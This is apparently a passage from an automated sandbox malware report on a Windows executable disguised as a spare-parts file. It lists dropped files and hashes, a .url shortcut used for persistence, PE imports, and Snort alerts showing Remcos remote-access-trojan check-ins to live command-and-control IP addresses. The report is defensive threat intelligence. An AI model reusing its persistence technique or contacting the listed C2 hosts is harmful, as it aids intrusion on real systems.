                                                              doc_59920100958-825495361592.pdf.vbsGet hashmaliciousBrowse
                                                              • 79.134.225.116
                                                              NEWFILE.EXE.exeGet hashmaliciousBrowse
                                                              • 79.134.225.18
                                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                              • 79.134.225.115
                                                              SecuriteInfo.com.W32.AIDetectNet.01.21512.exeGet hashmaliciousBrowse
                                                              • 79.134.225.20
                                                              ACH Payments.xlsGet hashmaliciousBrowse
                                                              • 79.134.225.8
                                                              ach payment 082422.xlsGet hashmaliciousBrowse
                                                              • 79.134.225.115
                                                              RFQ Number OQ22021653 .exeGet hashmaliciousBrowse
                                                              • 79.134.225.94
                                                              GiroSwift.exeGet hashmaliciousBrowse
                                                              • 79.134.225.30

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\Public\Libraries\Uuddcmhn

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):480659
                                                              Entropy (8bit):7.62462346641683
                                                              Encrypted:false
                                                              SSDEEP:6144:jrTXX3LmixWq7CZa6Lq9RbXexQVfidsgSIyt7vn5/ASMxTwJIVY/qT6IWJr3Nl:Lrm586LqvLfidsgSIyt7v5/Av4Aar3j
                                                              MD5:BDA5D05E69D1250185EB2A960559D745
                                                              SHA1:2A7F2817700777EEB0EF7696C7D5E690B0569A8B
                                                              SHA-256:28FED22EE035133150117308519D9E27BA54195987582A21128ED1DB2499DC46
                                                              SHA-512:299042F47CB7723B3A0C9A9F8EC2F73FF2B5B572BF2CECB9A8BB5BFC8E5FFEA8C9F6445C38885EF9B8984FE8FF996C7160A0617CF82F81B92F72F2869C84CA22
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:..Yg..K...Kg.88.OQM..K.g{88 .g.{2.g..OQg..K...Kg.88.OQM..K.g{88 .g.{2.g..OQg..K...Kg.88.OQM..K.g{88 .g.{2.g..OQ.g..K...Kg.88.OQM..K.g{88 .g.{2.g..OQ.g..K...Kg.88.OQM..K.g{88 .g.{2.g..OQg..K...Kg.88.OQM..K.g{88 .g.{2.g..OQ...Z`bfrvthv..._..hr..n...v.....lbt.x.Z.vv.Zfp.f..Z..pn...nh.pjh..b...$..A.w. si.}2}.w.q...".y....2$..4.z....y..L...".nxdpjv...2`..}^..y... W|.2f..(].$6......iy...w...g..01..6t.2.1. ...s[.....iO'.s"....GD4...p...>..kM.....w.E..Z..8c.4..4.2.wt..s.bfrjthvxx.....h..n?fZvv.`.lbt.x.Z.vlt..^.f@rZ..rn...n.*.jvjZ.b.jth.xx.....hrx..v..v.t.f.lbt.x...vj.Zfp.f..ZA.p^...nxdpZvZj.bfrjtxvxx.....hr.z.p..v....tlw..x.Z.vv.Zfp.f..Z..p.b.IVxd`WpZ..bfrjthvxx.....hr...c..^...T.rb..x.Z.vv.Zfp..j....pn...nxdpjvZZ.bfrjthvxx..<...y..n..\v.......t.l.Z.vv.Zfp.f..Z.p.<2..{.pj.&..b.jtk.xxRx...hr..nv..v.:..<..~0z.Z...Zf.f..Z...x...nxdpjvZZ.b.rj..}.,....rhr......l.....lbt.x.Z.vv.Zf..f.J.|}.2..Ptxdp.ZZ.bfr.jhvxx.....hr...v.R.2...lbi>x.Z..v.-fp....Z..pn...nxdp.vZ.Bk..*.hv.P...a`hr<.

                                                              C:\Users\Public\Libraries\Uuddcmhn.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):932352
                                                              Entropy (8bit):6.888508368562933
                                                              Encrypted:false
                                                              SSDEEP:12288:WZ3m2ifTnKeXXOeh0jbXGrapowu0ZCWNDoCHjsG83q/rhf7fvQBc:A9irKeXXOehw2rapowuCCsoT3q/lvkc
                                                              MD5:E9D007AC53470351186A5B53BC180ED3
                                                              SHA1:E1411689C7EB12DC132DB9496F25736FBA5E9F0D
                                                              SHA-256:C60E8A14ABC81AE3F2FFBE04B32240A92B900107E4ACC9EB88E43632AEE1266C
                                                              SHA-512:EEDD82A4F7756D9B197E0190065B20A1AB3D4FED6900D72E816D7303F3F511F87F4EEFDE3F450D2202EE5AFF5364D4F5943D63D1D1B0F04C7FB84EA93D1F515F
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:MZ~.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................4...........D.......P....@..............................................@..............................$*...p...B.......................k..................................................................................text...(........................... ..`.itext.......0.......(.............. ..`.data........P.......>..............@....bss.....8...p.......\...................idata..$*.......,...\..............@....tls....4................................rdata..............................@..@.reloc...k.......l..................@..B.rsrc....B...p...D..................@..@.....................<..............@..@................................................................................................

                                                              C:\Users\Public\Libraries\Uuddcmhn.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\Users\Public\Libraries\nhmcdduU.url

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Uuddcmhn.exe">), ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):99
                                                              Entropy (8bit):4.9258974387519805
                                                              Encrypted:false
                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMAINLJIvsGKd5Nt1AXvn:HRYFVmTWDyzSZJIvsb5C/n
                                                              MD5:D3F653ECF64BDBB3454D8CA7CEC72616
                                                              SHA1:19190178B4EEC89FAB68D42F0D60BE6F430141ED
                                                              SHA-256:96922567D02DA5AF96C658D43C51028308D60BD8BD997094EEC5B4014A5AAC83
                                                              SHA-512:3DD4C70494E838720CBB9ACFB7CDD9C7C8E0009DA1E2D2B77630F29077090A630874E01760407DF089ECCDD4EBC4B181D76AFCE6ADC63879AEA55FCF67C9ACBB
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\nhmcdduU.url, Author: @itsreallynick (Nick Carr)
                                                              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\nhmcdduU.url, Author: @itsreallynick (Nick Carr)
                                                              Reputation:low
                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Uuddcmhn.exe"..IconIndex=15..HotKey=5..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\json[1].json

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:HTML document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):945
                                                              Entropy (8bit):4.99976713795867
                                                              Encrypted:false
                                                              SSDEEP:12:tklWnd6UGkMyGWKyMPVGADxapaiH8GdAPORkoao9W7im51w7j9eF6xIjSat5Rt8P:ql6dVauKyM85266m7p9xZPn
                                                              MD5:3861CFACAE1FE80283E6D3A8CBA98B8E
                                                              SHA1:D11CBE1449EA9072FECF3A5F75616EB2966205A2
                                                              SHA-256:54F669BBD15EEBD1464CD7E8780382211DD7E637D03E88C832B90B94E3133AC6
                                                              SHA-512:B5034F3BDCE7548D2BB3B2A3A718F59A1B302C2F4FB8B45588FCBB0C1170E50016735B4A09A67F36471F94F509EDF6D27427D61C761E5A181091E780146CAC69
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:{. "geoplugin_request":"84.17.52.43",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Zurich",. "geoplugin_region":"Zurich",. "geoplugin_regionCode":"ZH",. "geoplugin_regionName":"Zurich",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.43",. "geoplugin_longitude":"8.5718",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9635.}

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.888508368562933
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.81%
                                                              • Windows Screen Saver (13104/52) 0.13%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              File name:DWG spare parts 455RTMGF Model.exe
                                                              File size:932352
                                                              MD5:e9d007ac53470351186a5b53bc180ed3
                                                              SHA1:e1411689c7eb12dc132db9496f25736fba5e9f0d
                                                              SHA256:c60e8a14abc81ae3f2ffbe04b32240a92b900107e4acc9eb88e43632aee1266c
                                                              SHA512:eedd82a4f7756d9b197e0190065b20a1ab3d4fed6900d72e816d7303f3f511f87f4eefde3f450d2202ee5aff5364d4f5943d63d1d1b0f04c7fb84ea93d1f515f
                                                              SSDEEP:12288:WZ3m2ifTnKeXXOeh0jbXGrapowu0ZCWNDoCHjsG83q/rhf7fvQBc:A9irKeXXOehw2rapowuCCsoT3q/lvkc
                                                              TLSH:72159FF7F2F08B33D0131A7DCA7732999A7D7E602820744B67E53A48DFB8541242A967
                                                              File Content Preview:MZ~.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                              File Icon

                                                              Icon Hash:33d8dcd6d6d8d007

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4644b0
                                                              Entrypoint Section:.itext
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                              DLL Characteristics:
                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:382d9c538727c04c8c0ffa65db10afc6

                                                              Entrypoint Preview

                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              add esp, FFFFFFF0h
                                                              mov eax, 00462A90h
                                                              call 00007FD51CA414BDh
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              call 00007FD51CA914F5h
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              mov edx, 00464510h
                                                              call 00007FD51CA90F7Ch
                                                              mov ecx, dword ptr [00466934h]
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              mov edx, dword ptr [00462790h]
                                                              call 00007FD51CA914E4h
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              call 00007FD51CA91558h
                                                              call 00007FD51CA3F31Bh
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6b0000x2a24.idata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x770000x74214.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x6bb0.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x6f0000x18.rdata
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x6b7cc0x68c.idata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x61d280x61e00False0.5269346663473818data6.5520535208916IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .itext0x630000x151c0x1600False0.4794034090909091data5.734511848958881IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .data0x650000x1cc40x1e00False0.40091145833333336data3.8120626934413533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .bss0x670000x38cc0x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .idata0x6b0000x2a240x2c00False0.30823863636363635data5.077763944032896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .tls0x6e0000x340x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rdata0x6f0000x180x200False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x700000x6bb00x6c00False0.6401548032407407data6.699520587980857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x770000x742140x74400False0.4358303931451613data6.380771448539127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_BITMAP0x777740x1d0dataEnglishUnited States
                                                              RT_BITMAP0x779440x1e4dataEnglishUnited States
                                                              RT_BITMAP0x77b280x1d0dataEnglishUnited States
                                                              RT_BITMAP0x77cf80x1d0dataEnglishUnited States
                                                              RT_BITMAP0x77ec80x1d0dataEnglishUnited States
                                                              RT_BITMAP0x780980x1d0dataEnglishUnited States
                                                              RT_BITMAP0x782680x1d0dataEnglishUnited States
                                                              RT_BITMAP0x784380x1d0dataEnglishUnited States
                                                              RT_BITMAP0x786080x1d0dataEnglishUnited States
                                                              RT_BITMAP0x787d80x1d0dataEnglishUnited States
                                                              RT_ICON0x789a80x1a68data
                                                              RT_ICON0x7a4100x468GLS_BINARY_LSB_FIRST
                                                              RT_STRING0x7a8780xbcdata
                                                              RT_STRING0x7a9340x3f0data
                                                              RT_STRING0x7ad240x1f8data
                                                              RT_STRING0x7af1c0xccdata
                                                              RT_STRING0x7afe80x10cdata
                                                              RT_STRING0x7b0f40x31cdata
                                                              RT_STRING0x7b4100x3c8data
                                                              RT_STRING0x7b7d80x370data
                                                              RT_STRING0x7bb480x3ccdata
                                                              RT_STRING0x7bf140x214data
                                                              RT_STRING0x7c1280xccdata
                                                              RT_STRING0x7c1f40x194data
                                                              RT_STRING0x7c3880x3c4data
                                                              RT_STRING0x7c74c0x338data
                                                              RT_STRING0x7ca840x294data
                                                              RT_RCDATA0x7cd180x6dc22GIF image data, version 89a, 236 x 419EnglishUnited States
                                                              RT_RCDATA0xea93c0x10data
                                                              RT_RCDATA0xea94c0x348data
                                                              RT_GROUP_ICON0xeac940x22data
                                                              RT_VERSION0xeacb80x55cdataEnglishUnited States

                                                              Imports

                                                              DLLImport
                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                              user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                              user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetROP2, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                              kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, TlsFree, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                              oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                                                              ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                              kernel32.dllSleep
                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              192.168.2.7141.8.192.15149731802850263 09/16/22-17:08:58.134170TCP2850263ETPRO TROJAN MalDoc Downloader User-Agent4973180192.168.2.7141.8.192.151
                                                              192.168.2.7141.8.192.15149721802850263 09/16/22-17:08:30.690772TCP2850263ETPRO TROJAN MalDoc Downloader User-Agent4972180192.168.2.7141.8.192.151
                                                              192.168.2.7141.8.192.15149727802850263 09/16/22-17:08:49.810384TCP2850263ETPRO TROJAN MalDoc Downloader User-Agent4972780192.168.2.7141.8.192.151
                                                              79.134.225.115192.168.2.72442497252032777 09/16/22-17:10:37.016548TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24424972579.134.225.115192.168.2.7
                                                              192.168.2.779.134.225.1154972524422032776 09/16/22-17:08:34.884246TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497252442192.168.2.779.134.225.115

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 16, 2022 17:08:30.628906965 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.689263105 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.689409018 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.690772057 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.751000881 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752866983 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752892971 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752921104 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752940893 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752955914 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752974987 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.752986908 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.753009081 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.753016949 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.753036976 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.753052950 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.753061056 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.753078938 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.753086090 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.753103018 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.753128052 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.755254030 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.755285025 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.757185936 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813421011 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813446999 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813471079 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813510895 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813528061 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813549995 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813561916 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813582897 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813601971 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813616991 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813627958 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813643932 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813649893 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813668013 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813673019 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813692093 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813704014 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813719034 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813740015 CEST8049721141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:30.813745022 CEST4972180192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:30.813764095 CEST8049721141.8.192.151192.168.2.7
